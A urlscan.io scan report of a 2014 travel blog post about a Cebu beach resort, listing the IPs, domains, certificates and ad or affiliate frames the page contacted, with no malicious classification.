www.itravelrox.com Open in urlscan Pro
2606:4700:3032::6815:4c47 Public Scan

Go To Rescan
Add Verdict Report

Submitted URL:
http://itravelrox.com/2014/06/22/unwinding-at-luna-beach-resort-in-san-fernando-cebu
Effective URL:
https://www.itravelrox.com/2014/06/22/unwinding-at-luna-beach-resort-in-san-fernando-cebu/
Submission: On April 02 via manual (April 2nd 2021, 3:11:26 am UTC) from US

Summary HTTP 219 Redirects Links 13 Behaviour Indicators

Summary

This website contacted 39 IPs in 6 countries across 32 domains to perform 219 HTTP transactions. The main IP is 2606:4700:3032::6815:4c47, located in United States and belongs to CLOUDFLARENET, US. The main domain is www.itravelrox.com.
TLS certificate: Issued by Cloudflare Inc ECC CA-3 on August 4th 2020. Valid for: a year.

This is the only time www.itravelrox.com was scanned on urlscan.io!

urlscan.io Verdict: No classification

Domain & IP information

	IP Address	AS Autonomous System
2 48	2606:4700:303... 2606:4700:3032::6815:4c47	13335 (CLOUDFLAR...) (CLOUDFLARENET)
1	2a00:1450:400... 2a00:1450:4001:802::2008	15169 (GOOGLE) (GOOGLE)
5	2a00:1450:400... 2a00:1450:4001:828::200a	15169 (GOOGLE) (GOOGLE)
1	2606:4700:10:... 2606:4700:10::6816:37d8	13335 (CLOUDFLAR...) (CLOUDFLARENET)
16	2a00:1450:400... 2a00:1450:4001:812::2002	15169 (GOOGLE) (GOOGLE)
13 13	185.59.220.194 185.59.220.194	60068 (CDN77 (^_^)/) (CDN77 (^_^)/)
1 1	151.101.1.21 151.101.1.21	54113 (FASTLY) (FASTLY)
1	104.111.228.123 104.111.228.123	16625 (AKAMAI-AS) (AKAMAI-AS)
1 1	152.195.39.124 152.195.39.124	15133 (EDGECAST) (EDGECAST)
1	184.31.81.115 184.31.81.115	20940 (AKAMAI-ASN1) (AKAMAI-ASN1)
4	104.111.235.205 104.111.235.205	16625 (AKAMAI-AS) (AKAMAI-AS)
1	2a00:1450:400... 2a00:1450:4001:82b::200e	15169 (GOOGLE) (GOOGLE)
1	2a00:1450:400... 2a00:1450:4001:808::2002	15169 (GOOGLE) (GOOGLE)
1	142.250.185.130 142.250.185.130	15169 (GOOGLE) (GOOGLE)
5	2a00:1450:400... 2a00:1450:4001:801::2002	15169 (GOOGLE) (GOOGLE)
23	2a00:1450:400... 2a00:1450:4001:82a::2002	15169 (GOOGLE) (GOOGLE)
7	2a00:1450:400... 2a00:1450:4001:813::2002	15169 (GOOGLE) (GOOGLE)
5	2a00:1450:400... 2a00:1450:4001:802::200e	15169 (GOOGLE) (GOOGLE)
44	2a00:1450:400... 2a00:1450:4001:828::2001	15169 (GOOGLE) (GOOGLE)
6	2a00:1450:400... 2a00:1450:4001:810::2003	15169 (GOOGLE) (GOOGLE)
3	2a00:1450:400... 2a00:1450:4001:811::200e	15169 (GOOGLE) (GOOGLE)
7	2a00:1450:400... 2a00:1450:4001:80f::2003	15169 (GOOGLE) (GOOGLE)
1	2a00:1450:400... 2a00:1450:4001:808::2004	15169 (GOOGLE) (GOOGLE)
1 2	2a00:1450:400... 2a00:1450:4001:812::2004	15169 (GOOGLE) (GOOGLE)
1	2600:3c02:1::... 2600:3c02:1::2d4f:f40e	63949 (LINODE-AP...) (LINODE-AP Linode)
1	5.57.16.90 5.57.16.90	43996 (BOOKING-B...) (BOOKING-BV Booking.com)
4	203.160.137.61 203.160.137.61	45530 (AGODA-TH-...) (AGODA-TH-AS-AP The Offices at Central World)
4	2600:9000:212... 2600:9000:2127:9400:1b:29b:ed80:93a1	16509 (AMAZON-02) (AMAZON-02)
2	2a03:2880:f01... 2a03:2880:f01c:8012:face:b00c:0:3	32934 (FACEBOOK) (FACEBOOK)
1 2	2620:116:800d... 2620:116:800d:21:5a23:9c4e:e774:96c1	16509 (AMAZON-02) (AMAZON-02)
2 2	35.244.174.68 35.244.174.68	15169 (GOOGLE) (GOOGLE)
13	142.250.186.162 142.250.186.162	15169 (GOOGLE) (GOOGLE)
4 4	35.186.253.211 35.186.253.211	15169 (GOOGLE) (GOOGLE)
4 4	185.64.190.78 185.64.190.78	62713 (AS-PUBMATIC) (AS-PUBMATIC)
2 2	69.173.144.138 69.173.144.138	26667 (RUBICONPR...) (RUBICONPROJECT)
4 4	2.18.234.21 2.18.234.21	16625 (AKAMAI-AS) (AKAMAI-AS)
1	2a05:d01c:1d8... 2a05:d01c:1d8:8100:1c45:c4d6:f2b8:9306	16509 (AMAZON-02) (AMAZON-02)
1	2600:9000:212... 2600:9000:2127:b000:0:5a51:64c9:c681	16509 (AMAZON-02) (AMAZON-02)
1	2600:9000:212... 2600:9000:2127:f200:0:5a51:64c9:c681	16509 (AMAZON-02) (AMAZON-02)
1	5.57.17.220 5.57.17.220	43996 (BOOKING-B...) (BOOKING-BV Booking.com)
2	2a00:1450:400... 2a00:1450:4001:813::2008	15169 (GOOGLE) (GOOGLE)
1 1	99.80.199.35 99.80.199.35	16509 (AMAZON-02) (AMAZON-02)
1	34.98.67.61 34.98.67.61	15169 (GOOGLE) (GOOGLE)
1 2	18.140.171.72 18.140.171.72	16509 (AMAZON-02) (AMAZON-02)
2	2600:9000:218... 2600:9000:2182:6a00:1f:e2ee:200:93a1	16509 (AMAZON-02) (AMAZON-02)
1	5.57.16.100 5.57.16.100	43996 (BOOKING-B...) (BOOKING-BV Booking.com)
2	5.57.16.99 5.57.16.99	43996 (BOOKING-B...) (BOOKING-BV Booking.com)
219	39

48 2606:4700:3032::6815:4c47 (United States) 2 redirects

ASN13335 (CLOUDFLARENET, US)

itravelrox.com	Domain lookup VirusTotal SecurityTrails crt.sh Censys Domaintools
www.itravelrox.com	Domain lookup VirusTotal SecurityTrails crt.sh Censys Domaintools

1 2a00:1450:4001:802::2008 (Frankfurt am Main, Germany)

ASN15169 (GOOGLE, US)

www.googletagmanager.com	Domain lookup VirusTotal SecurityTrails crt.sh Censys Domaintools

5 2a00:1450:4001:828::200a (Frankfurt am Main, Germany)

ASN15169 (GOOGLE, US)

fonts.googleapis.com	Domain lookup VirusTotal SecurityTrails crt.sh Censys Domaintools

1 2606:4700:10::6816:37d8 (United States)

ASN13335 (CLOUDFLARENET, US)

static.zotabox.com	Domain lookup VirusTotal SecurityTrails crt.sh Censys Domaintools

16 2a00:1450:4001:812::2002 (Frankfurt am Main, Germany)

ASN15169 (GOOGLE, US)

pagead2.googlesyndication.com	Domain lookup VirusTotal SecurityTrails crt.sh Censys Domaintools

13 185.59.220.194 (Frankfurt am Main, Germany) 13 redirects

ASN60068 (CDN77 (^_^)/, GB)
PTR: unn-185-59-220-194.datapacket.com

cdn.shortpixel.ai	Domain lookup VirusTotal SecurityTrails crt.sh Censys Domaintools

1 151.101.1.21 (United States) 1 redirects

ASN54113 (FASTLY, US)

www.paypal.com	Domain lookup VirusTotal SecurityTrails crt.sh Censys Domaintools

1 104.111.228.123 (Frankfurt am Main, Germany)

ASN16625 (AKAMAI-AS, US)
PTR: a104-111-228-123.deploy.static.akamaitechnologies.com

www.paypalobjects.com	Domain lookup VirusTotal SecurityTrails crt.sh Censys Domaintools

1 152.195.39.124 (United States) 1 redirects

ASN15133 (EDGECAST, US)

banner.agoda.com	Domain lookup VirusTotal SecurityTrails crt.sh Censys Domaintools

1 184.31.81.115 (Frankfurt am Main, Germany)

ASN20940 (AKAMAI-ASN1, NL)
PTR: a184-31-81-115.deploy.static.akamaitechnologies.com

www.agoda.com	Domain lookup VirusTotal SecurityTrails crt.sh Censys Domaintools

4 104.111.235.205 (Frankfurt am Main, Germany)

ASN16625 (AKAMAI-AS, US)
PTR: a104-111-235-205.deploy.static.akamaitechnologies.com

cdn0.agoda.net	Domain lookup VirusTotal SecurityTrails crt.sh Censys Domaintools
cdn6.agoda.net	Domain lookup VirusTotal SecurityTrails crt.sh Censys Domaintools

1 2a00:1450:4001:82b::200e (Frankfurt am Main, Germany)

ASN15169 (GOOGLE, US)

www.google-analytics.com	Domain lookup VirusTotal SecurityTrails crt.sh Censys Domaintools

1 2a00:1450:4001:808::2002 (Frankfurt am Main, Germany)

ASN15169 (GOOGLE, US)

googleads.g.doubleclick.net	Domain lookup VirusTotal SecurityTrails crt.sh Censys Domaintools

1 142.250.185.130 (United States)

ASN15169 (GOOGLE, US)
PTR: fra16s50-in-f2.1e100.net

partner.googleadservices.com	Domain lookup VirusTotal SecurityTrails crt.sh Censys Domaintools

5 2a00:1450:4001:801::2002 (Frankfurt am Main, Germany)

ASN15169 (GOOGLE, US)

adservice.google.de	Domain lookup VirusTotal SecurityTrails crt.sh Censys Domaintools
adservice.google.com	Domain lookup VirusTotal SecurityTrails crt.sh Censys Domaintools

23 2a00:1450:4001:82a::2002 (Frankfurt am Main, Germany)

ASN15169 (GOOGLE, US)

googleads.g.doubleclick.net	Domain lookup VirusTotal SecurityTrails crt.sh Censys Domaintools
adservice.google.de	Domain lookup VirusTotal SecurityTrails crt.sh Censys Domaintools

7 2a00:1450:4001:813::2002 (Frankfurt am Main, Germany)

ASN15169 (GOOGLE, US)

www.googletagservices.com	Domain lookup VirusTotal SecurityTrails crt.sh Censys Domaintools

5 2a00:1450:4001:802::200e (Frankfurt am Main, Germany)

ASN15169 (GOOGLE, US)

www.google-analytics.com	Domain lookup VirusTotal SecurityTrails crt.sh Censys Domaintools
encrypted-tbn0.gstatic.com	Domain lookup VirusTotal SecurityTrails crt.sh Censys Domaintools

44 2a00:1450:4001:828::2001 (Frankfurt am Main, Germany)

ASN15169 (GOOGLE, US)

tpc.googlesyndication.com	Domain lookup VirusTotal SecurityTrails crt.sh Censys Domaintools

6 2a00:1450:4001:810::2003 (Frankfurt am Main, Germany)

ASN15169 (GOOGLE, US)

www.gstatic.com	Domain lookup VirusTotal SecurityTrails crt.sh Censys Domaintools

3 2a00:1450:4001:811::200e (Frankfurt am Main, Germany)

ASN15169 (GOOGLE, US)

encrypted-tbn2.gstatic.com	Domain lookup VirusTotal SecurityTrails crt.sh Censys Domaintools

7 2a00:1450:4001:80f::2003 (Frankfurt am Main, Germany)

ASN15169 (GOOGLE, US)

fonts.gstatic.com	Domain lookup VirusTotal SecurityTrails crt.sh Censys Domaintools

1 2a00:1450:4001:808::2004 (Frankfurt am Main, Germany)

ASN15169 (GOOGLE, US)

www.google.com	Domain lookup VirusTotal SecurityTrails crt.sh Censys Domaintools

2 2a00:1450:4001:812::2004 (Frankfurt am Main, Germany) 1 redirects

ASN15169 (GOOGLE, US)

www.google.com	Domain lookup VirusTotal SecurityTrails crt.sh Censys Domaintools

1 2600:3c02:1::2d4f:f40e (United States)

ASN63949 (LINODE-AP Linode, LLC, US)

synad3.nuffnang.com.ph	Domain lookup VirusTotal SecurityTrails crt.sh Censys Domaintools

1 5.57.16.90 (Netherlands)

ASN43996 (BOOKING-BV Booking.com, NL)
PTR: bstatic.com

aff.bstatic.com	Domain lookup VirusTotal SecurityTrails crt.sh Censys Domaintools

4 203.160.137.61 (Netherlands)

ASN45530 (AGODA-TH-AS-AP The Offices at Central World, 27th floor, TH)

sherpa.agoda.com	Domain lookup VirusTotal SecurityTrails crt.sh Censys Domaintools

4 2600:9000:2127:9400:1b:29b:ed80:93a1 (United States)

ASN16509 (AMAZON-02, US)

cdn.klook.com	Domain lookup VirusTotal SecurityTrails crt.sh Censys Domaintools

2 2a03:2880:f01c:8012:face:b00c:0:3 (United States)

ASN32934 (FACEBOOK, US)

connect.facebook.net	Domain lookup VirusTotal SecurityTrails crt.sh Censys Domaintools

2 2620:116:800d:21:5a23:9c4e:e774:96c1 (United States) 1 redirects

ASN16509 (AMAZON-02, US)

cms.quantserve.com	Domain lookup VirusTotal SecurityTrails crt.sh Censys Domaintools

2 35.244.174.68 (Kansas City, United States) 2 redirects

ASN15169 (GOOGLE, US)
PTR: 68.174.244.35.bc.googleusercontent.com

id.rlcdn.com	Domain lookup VirusTotal SecurityTrails crt.sh Censys Domaintools

13 142.250.186.162 (United States)

ASN15169 (GOOGLE, US)
PTR: fra24s08-in-f2.1e100.net

cm.g.doubleclick.net	Domain lookup VirusTotal SecurityTrails crt.sh Censys Domaintools

4 35.186.253.211 (Kansas City, United States) 4 redirects

ASN15169 (GOOGLE, US)
PTR: 211.253.186.35.bc.googleusercontent.com

rtb.openx.net	Domain lookup VirusTotal SecurityTrails crt.sh Censys Domaintools

4 185.64.190.78 (United Kingdom) 4 redirects

ASN62713 (AS-PUBMATIC, US)

image6.pubmatic.com	Domain lookup VirusTotal SecurityTrails crt.sh Censys Domaintools

2 69.173.144.138 (Frankfurt am Main, Germany) 2 redirects

ASN26667 (RUBICONPROJECT, US)

pixel.rubiconproject.com	Domain lookup VirusTotal SecurityTrails crt.sh Censys Domaintools

4 2.18.234.21 (Frankfurt am Main, Germany) 4 redirects

ASN16625 (AKAMAI-AS, US)
PTR: a2-18-234-21.deploy.static.akamaitechnologies.com

ssum-sec.casalemedia.com	Domain lookup VirusTotal SecurityTrails crt.sh Censys Domaintools

1 2a05:d01c:1d8:8100:1c45:c4d6:f2b8:9306 (London, United Kingdom)

ASN16509 (AMAZON-02, US)

ag.innovid.com	Domain lookup VirusTotal SecurityTrails crt.sh Censys Domaintools

1 2600:9000:2127:b000:0:5a51:64c9:c681 (United States)

ASN16509 (AMAZON-02, US)

farm4.staticflickr.com	Domain lookup VirusTotal SecurityTrails crt.sh Censys Domaintools

1 2600:9000:2127:f200:0:5a51:64c9:c681 (United States)

ASN16509 (AMAZON-02, US)

farm3.staticflickr.com	Domain lookup VirusTotal SecurityTrails crt.sh Censys Domaintools

1 5.57.17.220 (Netherlands)

ASN43996 (BOOKING-BV Booking.com, NL)
PTR: www.booking.com

www.booking.com	Domain lookup VirusTotal SecurityTrails crt.sh Censys Domaintools

2 2a00:1450:4001:813::2008 (Frankfurt am Main, Germany)

ASN15169 (GOOGLE, US)

www.googletagmanager.com	Domain lookup VirusTotal SecurityTrails crt.sh Censys Domaintools

1 99.80.199.35 (Dublin, Ireland) 1 redirects

ASN16509 (AMAZON-02, US)
PTR: ec2-99-80-199-35.eu-west-1.compute.amazonaws.com

pixel.everesttech.net	Domain lookup VirusTotal SecurityTrails crt.sh Censys Domaintools

1 34.98.67.61 (Kansas City, United States)

ASN15169 (GOOGLE, US)
PTR: 61.67.98.34.bc.googleusercontent.com

odr.mookie1.com	Domain lookup VirusTotal SecurityTrails crt.sh Censys Domaintools

2 18.140.171.72 (Singapore, Singapore) 1 redirects

ASN16509 (AMAZON-02, US)
PTR: ec2-18-140-171-72.ap-southeast-1.compute.amazonaws.com

affiliate.klook.com	Domain lookup VirusTotal SecurityTrails crt.sh Censys Domaintools

2 2600:9000:2182:6a00:1f:e2ee:200:93a1 (United States)

ASN16509 (AMAZON-02, US)

cf.bstatic.com	Domain lookup VirusTotal SecurityTrails crt.sh Censys Domaintools

1 5.57.16.100 (Netherlands)

ASN43996 (BOOKING-BV Booking.com, NL)
PTR: r.bstatic.com

r.bstatic.com	Domain lookup VirusTotal SecurityTrails crt.sh Censys Domaintools

2 5.57.16.99 (Netherlands)

ASN43996 (BOOKING-BV Booking.com, NL)
PTR: q.bstatic.com

q.bstatic.com	Domain lookup VirusTotal SecurityTrails crt.sh Censys Domaintools

	Apex Domain Subdomains	Transfer
60	googlesyndication.com pagead2.googlesyndication.com tpc.googlesyndication.com	639 KB
48	itravelrox.com 2 redirects itravelrox.com www.itravelrox.com	404 KB
34	doubleclick.net googleads.g.doubleclick.net cm.g.doubleclick.net	162 KB
18	gstatic.com www.gstatic.com encrypted-tbn2.gstatic.com encrypted-tbn0.gstatic.com fonts.gstatic.com	342 KB
13	shortpixel.ai 13 redirects cdn.shortpixel.ai	9 KB
7	googletagservices.com www.googletagservices.com	243 KB
7	google.com 1 redirects adservice.google.com www.google.com	675 B
6	klook.com 1 redirects cdn.klook.com affiliate.klook.com	93 KB
6	bstatic.com aff.bstatic.com cf.bstatic.com r.bstatic.com q.bstatic.com	51 KB
6	agoda.com 1 redirects banner.agoda.com www.agoda.com sherpa.agoda.com	75 KB
5	googleapis.com fonts.googleapis.com	4 KB
4	casalemedia.com 4 redirects ssum-sec.casalemedia.com	4 KB
4	pubmatic.com 4 redirects image6.pubmatic.com	3 KB
4	openx.net 4 redirects rtb.openx.net	1 KB
4	google.de adservice.google.de	1 KB
4	google-analytics.com www.google-analytics.com	57 KB
4	agoda.net cdn0.agoda.net cdn6.agoda.net	103 KB
3	googletagmanager.com www.googletagmanager.com	113 KB
2	staticflickr.com farm4.staticflickr.com farm3.staticflickr.com	225 KB
2	rubiconproject.com 2 redirects pixel.rubiconproject.com	913 B
2	rlcdn.com 2 redirects id.rlcdn.com	890 B
2	quantserve.com 1 redirects cms.quantserve.com	797 B
2	facebook.net connect.facebook.net	62 KB
1	mookie1.com odr.mookie1.com	324 B
1	everesttech.net 1 redirects pixel.everesttech.net	376 B
1	booking.com www.booking.com	2 KB
1	innovid.com ag.innovid.com	295 B
1	nuffnang.com.ph synad3.nuffnang.com.ph
1	googleadservices.com partner.googleadservices.com	263 B
1	paypalobjects.com www.paypalobjects.com	2 KB
1	paypal.com 1 redirects www.paypal.com	681 B
1	zotabox.com static.zotabox.com
219	32

	Domain	Requested by
46	www.itravelrox.com	www.itravelrox.com
44	tpc.googlesyndication.com	googleads.g.doubleclick.net www.itravelrox.com tpc.googlesyndication.com pagead2.googlesyndication.com
21	googleads.g.doubleclick.net	pagead2.googlesyndication.com googleads.g.doubleclick.net www.itravelrox.com
16	pagead2.googlesyndication.com	www.itravelrox.com pagead2.googlesyndication.com googleads.g.doubleclick.net tpc.googlesyndication.com www.googletagservices.com
13	cm.g.doubleclick.net	www.itravelrox.com googleads.g.doubleclick.net
13	cdn.shortpixel.ai	13 redirects
7	fonts.gstatic.com	fonts.googleapis.com
7	www.googletagservices.com	pagead2.googlesyndication.com googleads.g.doubleclick.net
6	www.gstatic.com	googleads.g.doubleclick.net
5	fonts.googleapis.com	www.itravelrox.com googleads.g.doubleclick.net
4	ssum-sec.casalemedia.com	4 redirects
4	image6.pubmatic.com	4 redirects
4	rtb.openx.net	4 redirects
4	cdn.klook.com	www.itravelrox.com affiliate.klook.com cdn.klook.com
4	sherpa.agoda.com	cdn0.agoda.net sherpa.agoda.com
4	adservice.google.com	pagead2.googlesyndication.com
4	adservice.google.de	pagead2.googlesyndication.com
4	www.google-analytics.com	www.googletagmanager.com www.google-analytics.com affiliate.klook.com
3	www.google.com	1 redirects googleads.g.doubleclick.net
3	encrypted-tbn2.gstatic.com	googleads.g.doubleclick.net
3	cdn0.agoda.net	www.itravelrox.com sherpa.agoda.com
3	www.googletagmanager.com	www.itravelrox.com sherpa.agoda.com affiliate.klook.com
2	q.bstatic.com	cf.bstatic.com
2	cf.bstatic.com	www.booking.com
2	affiliate.klook.com	1 redirects cdn.klook.com
2	pixel.rubiconproject.com	2 redirects
2	id.rlcdn.com	2 redirects
2	cms.quantserve.com	1 redirects googleads.g.doubleclick.net
2	connect.facebook.net	www.itravelrox.com connect.facebook.net
2	encrypted-tbn0.gstatic.com	googleads.g.doubleclick.net
2	itravelrox.com	2 redirects
1	r.bstatic.com	cf.bstatic.com
1	cdn6.agoda.net	sherpa.agoda.com
1	odr.mookie1.com	googleads.g.doubleclick.net
1	pixel.everesttech.net	1 redirects
1	www.booking.com	aff.bstatic.com
1	farm3.staticflickr.com	www.itravelrox.com
1	farm4.staticflickr.com	www.itravelrox.com
1	ag.innovid.com	googleads.g.doubleclick.net
1	aff.bstatic.com	www.itravelrox.com
1	synad3.nuffnang.com.ph	www.itravelrox.com
1	partner.googleadservices.com	pagead2.googlesyndication.com
1	www.agoda.com	www.itravelrox.com
1	banner.agoda.com	1 redirects
1	www.paypalobjects.com	www.itravelrox.com
1	www.paypal.com	1 redirects
1	static.zotabox.com	www.itravelrox.com
219	47

This site contains links to these domains. Also see Links.

Domain
itravelrox.com
www.agoda.com
www.booking.com
itravelrox.wordpress.com
gravatar.com
www.airbnb.com
www.brandbacker.com
www.thekindrednomads.com
h24.hostg.co
www.facebook.com
www.twitter.com
ph.linkedin.com
www.instagram.com

Subject Issuer	Validity	Valid
sni.cloudflaressl.com Cloudflare Inc ECC CA-3	`2020-08-04` - `2021-08-04`	a year	crt.sh
*.google-analytics.com GTS CA 1O1	`2021-03-11` - `2021-06-03`	3 months	crt.sh
upload.video.google.com GTS CA 1O1	`2021-03-11` - `2021-06-03`	3 months	crt.sh
*.g.doubleclick.net GTS CA 1O1	`2021-03-11` - `2021-06-03`	3 months	crt.sh
www.paypal.com DigiCert SHA2 Extended Validation Server CA	`2021-01-13` - `2022-01-11`	a year	crt.sh
*.agoda.com GeoTrust RSA CA 2018	`2020-08-31` - `2021-09-30`	a year	crt.sh
*.agoda.net GeoTrust RSA CA 2018	`2021-03-08` - `2022-03-16`	a year	crt.sh
*.google.de GTS CA 1O1	`2021-03-16` - `2021-06-08`	3 months	crt.sh
*.google.com GTS CA 1O1	`2021-03-16` - `2021-06-08`	3 months	crt.sh
tpc.googlesyndication.com GTS CA 1O1	`2021-03-11` - `2021-06-03`	3 months	crt.sh
*.gstatic.com GTS CA 1O1	`2021-03-11` - `2021-06-03`	3 months	crt.sh
www.google.com GTS CA 1O1	`2021-03-11` - `2021-06-03`	3 months	crt.sh
*.parklogic.com Sectigo RSA Domain Validation Secure Server CA	`2020-12-01` - `2022-01-01`	a year	crt.sh
*.bstatic.com DigiCert ECC Secure Server CA	`2019-12-13` - `2021-12-17`	2 years	crt.sh
*.klook.com DigiCert SHA2 Secure Server CA	`2020-01-21` - `2022-03-15`	2 years	crt.sh
*.facebook.com DigiCert SHA2 High Assurance Server CA	`2021-02-10` - `2021-05-10`	3 months	crt.sh
*.quantserve.com DigiCert SHA2 High Assurance Server CA	`2020-10-02` - `2021-10-07`	a year	crt.sh
*.innovid.com RapidSSL RSA CA 2018	`2020-02-07` - `2022-04-07`	2 years	crt.sh
static.flickr.com Amazon	`2021-02-11` - `2022-03-12`	a year	crt.sh
www.booking.com DigiCert ECC Extended Validation Server CA	`2019-11-08` - `2021-11-12`	2 years	crt.sh
*.mookie1.com DigiCert TLS RSA SHA256 2020 CA1	`2021-02-22` - `2022-03-25`	a year	crt.sh
affiliate.klook.com R3	`2021-03-02` - `2021-05-31`	3 months	crt.sh
q-cf.bstatic.com DigiCert TLS RSA SHA256 2020 CA1	`2021-01-12` - `2022-01-10`	a year	crt.sh

This page contains 22 frames:

Primary Page: https://www.itravelrox.com/2014/06/22/unwinding-at-luna-beach-resort-in-san-fernando-cebu/
Frame ID: DFA5B0DAA7DB1E9B4E2759B1233C2AF0
Requests: 79 HTTP requests in this frame

Frame: https://googleads.g.doubleclick.net/pagead/html/r20210331/r20190131/zrt_lookup.html
Frame ID: 07D3526D49837073C4199016810D916C
Requests: 1 HTTP requests in this frame

Frame: https://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-6761611880351053&output=html&adk=1812271804&adf=3025194257&lmt=1617333065&plat=1%3A32776%2C2%3A16809992%2C8%3A134217728%2C9%3A134250504%2C16%3A8388608%2C17%3A32%2C24%3A32%2C25%3A32%2C30%3A34635776%2C32%3A32&format=0x0&url=https%3A%2F%2Fwww.itravelrox.com%2F2014%2F06%2F22%2Funwinding-at-luna-beach-resort-in-san-fernando-cebu%2F&ea=0&flash=0&pra=5&wgl=1&dt=1617333065726&bpp=19&bdt=225&idt=148&shv=r20210331&cbv=r20190131&ptt=9&saldr=aa&abxe=1&nras=1&correlator=8191862741585&frm=20&pv=2&ga_vid=1624794491.1617333066&ga_sid=1617333066&ga_hid=999108565&ga_fc=0&u_tz=120&u_his=2&u_java=0&u_h=1200&u_w=1600&u_ah=1200&u_aw=1600&u_cd=24&u_nplug=0&u_nmime=0&adx=-12245933&ady=-12245933&biw=1600&bih=1200&scr_x=0&scr_y=0&eid=42530671%2C31060288%2C44740079%2C44739387&oid=3&pvsid=2798626016261363&rx=0&eae=2&fc=1920&brdim=0%2C0%2C0%2C0%2C1600%2C0%2C1600%2C1200%2C1600%2C1200&vis=1&rsz=%7C%7Cs%7C&abl=NS&fu=8192&bc=31&ifi=1&uci=a!1&fsb=1&dtd=173
Frame ID: CF6EB71F7EB486277A6F32ADCF2CC961
Requests: 1 HTTP requests in this frame

Frame: https://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-6761611880351053&output=html&h=280&slotname=2262990825&adk=3733099233&adf=398161349&pi=t.ma~as.2262990825&w=825&fwrn=4&fwrnh=100&lmt=1617333065&rafmt=1&psa=0&format=825x280&url=https%3A%2F%2Fwww.itravelrox.com%2F2014%2F06%2F22%2Funwinding-at-luna-beach-resort-in-san-fernando-cebu%2F&flash=0&fwr=0&rpe=1&resp_fmts=3&wgl=1&dt=1617333065745&bpp=57&bdt=244&idt=166&shv=r20210331&cbv=r20190131&ptt=9&saldr=aa&abxe=1&prev_fmts=0x0&nras=1&correlator=8191862741585&frm=20&pv=1&ga_vid=1624794491.1617333066&ga_sid=1617333066&ga_hid=999108565&ga_fc=0&u_tz=120&u_his=2&u_java=0&u_h=1200&u_w=1600&u_ah=1200&u_aw=1600&u_cd=24&u_nplug=0&u_nmime=0&adx=245&ady=1352&biw=1600&bih=1200&scr_x=0&scr_y=0&eid=42530671%2C31060288%2C44740079%2C44739387&oid=3&pvsid=2798626016261363&rx=0&eae=0&fc=1920&brdim=0%2C0%2C0%2C0%2C1600%2C0%2C1600%2C1200%2C1600%2C1200&vis=1&rsz=%7C%7ClEbr%7C&abl=CS&pfx=0&fu=8320&bc=31&ifi=2&uci=a!2&btvi=1&fsb=1&xpc=G2vAqXg6pL&p=https%3A//www.itravelrox.com&dtd=207
Frame ID: 3ACD4EF0C50403B7E58914120457E1C2
Requests: 14 HTTP requests in this frame

Frame: https://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-6761611880351053&output=html&h=187&slotname=1101473462&adk=1534294233&adf=336954501&pi=t.ma~as.1101473462&w=745&fwrn=4&lmt=1617333065&rafmt=11&psa=0&format=745x187&url=https%3A%2F%2Fwww.itravelrox.com%2F2014%2F06%2F22%2Funwinding-at-luna-beach-resort-in-san-fernando-cebu%2F&flash=0&wgl=1&dt=1617333065802&bpp=2&bdt=301&idt=166&shv=r20210331&cbv=r20190131&ptt=9&saldr=aa&abxe=1&prev_fmts=0x0%2C825x280&nras=1&correlator=8191862741585&frm=20&pv=1&ga_vid=1624794491.1617333066&ga_sid=1617333066&ga_hid=999108565&ga_fc=0&rplot=4&u_tz=120&u_his=2&u_java=0&u_h=1200&u_w=1600&u_ah=1200&u_aw=1600&u_cd=24&u_nplug=0&u_nmime=0&adx=285&ady=2239&biw=1600&bih=1200&scr_x=0&scr_y=0&eid=42530671%2C31060288%2C44740079%2C44739387&oid=3&pvsid=2798626016261363&rx=0&eae=0&fc=1920&brdim=0%2C0%2C0%2C0%2C1600%2C0%2C1600%2C1200%2C1600%2C1200&vis=1&rsz=%7C%7ClEbr%7C&abl=CS&pfx=0&fu=8320&bc=31&ifi=3&uci=a!3&btvi=2&fsb=1&xpc=ggk2H5poe9&p=https%3A//www.itravelrox.com&dtd=169
Frame ID: 586BAAE92C316557CD167830982C3D2C
Requests: 17 HTTP requests in this frame

Frame: https://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-6761611880351053&output=html&h=280&slotname=1661042523&adk=605609668&adf=2080630801&pi=t.ma~as.1661042523&w=1200&fwrn=4&fwrnh=100&lmt=1617333065&rafmt=1&to=pso&psa=0&channel=WordPressSinglePost%2Bpso-lv-5&format=1200x280&url=https%3A%2F%2Fwww.itravelrox.com%2F2014%2F06%2F22%2Funwinding-at-luna-beach-resort-in-san-fernando-cebu%2F&flash=0&fwr=0&rpe=1&resp_fmts=3&wgl=1&dt=1617333065804&bpp=1&bdt=303&idt=171&shv=r20210331&cbv=r20190131&ptt=9&saldr=aa&abxe=1&prev_fmts=0x0%2C825x280%2C745x187&nras=1&correlator=8191862741585&frm=20&pv=1&ga_vid=1624794491.1617333066&ga_sid=1617333066&ga_hid=999108565&ga_fc=0&u_tz=120&u_his=2&u_java=0&u_h=1200&u_w=1600&u_ah=1200&u_aw=1600&u_cd=24&u_nplug=0&u_nmime=0&adx=200&ady=86&biw=1600&bih=1200&scr_x=0&scr_y=0&eid=42530671%2C31060288%2C44740079%2C44739387&oid=3&pvsid=2798626016261363&rx=0&eae=0&fc=1920&brdim=0%2C0%2C0%2C0%2C1600%2C0%2C1600%2C1200%2C1600%2C1200&vis=1&rsz=%7C%7CeE%7C&abl=CS&pfx=0&fu=8320&bc=31&ifi=4&uci=a!4&fsb=1&xpc=Grt5bJypV6&p=https%3A//www.itravelrox.com&dtd=174
Frame ID: 28C65C04AC8C2921B72FD00291182C4A
Requests: 15 HTTP requests in this frame

Frame: https://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-6761611880351053&output=html&h=280&slotname=2262990825&adk=3733099233&adf=2452791592&pi=t.ma~as.2262990825&w=825&fwrn=4&fwrnh=100&lmt=1617333066&rafmt=1&psa=0&format=825x280&url=https%3A%2F%2Fwww.itravelrox.com%2F2014%2F06%2F22%2Funwinding-at-luna-beach-resort-in-san-fernando-cebu%2F&flash=0&fwr=0&rpe=1&resp_fmts=3&wgl=1&dt=1617333065805&bpp=1&bdt=305&idt=219&shv=r20210331&cbv=r20190131&ptt=9&saldr=aa&abxe=1&cookie=ID%3Dd0f5587c01a70123-22f0958f49a70094%3AT%3D1617333065%3ART%3D1617333065%3AS%3DALNI_MYQjSk9WoCrzFpSBVn0tmfFfayAzg&prev_fmts=0x0%2C825x280%2C745x187%2C1200x280&nras=1&correlator=8191862741585&frm=20&pv=1&ga_vid=1624794491.1617333066&ga_sid=1617333066&ga_hid=999108565&ga_fc=0&u_tz=120&u_his=2&u_java=0&u_h=1200&u_w=1600&u_ah=1200&u_aw=1600&u_cd=24&u_nplug=0&u_nmime=0